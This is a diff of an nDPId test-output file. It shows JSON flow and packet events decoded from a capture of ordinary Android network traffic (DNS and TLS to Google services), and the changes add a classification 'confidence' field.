 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454868597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454868597,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqkFAAEARCwnAqAIQwKgCAcjmADUALYwU2tsBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454868597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454868597,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRZjUAAEARjwXAqAIBwKgCEAA1yOYAPQ9d2tuBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAAEEABKzZqM4="}
-00754{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}}
-00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-02220{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}}
+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}}
+00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+02246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}}
 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454868606,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"ts_msec":1582454868606,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454869361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1582454869361,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qnVAAEARCtjAqAIQwKgCAZhgADUAKv996DEBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454869363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1582454869363,"pkt":"TGr2n\/YnxiwDYGpkCABFAABORPIAAEARsEvAqAIBwKgCEAA1mGAAOr6H6DGBgAABAAEAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"}
-00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="}
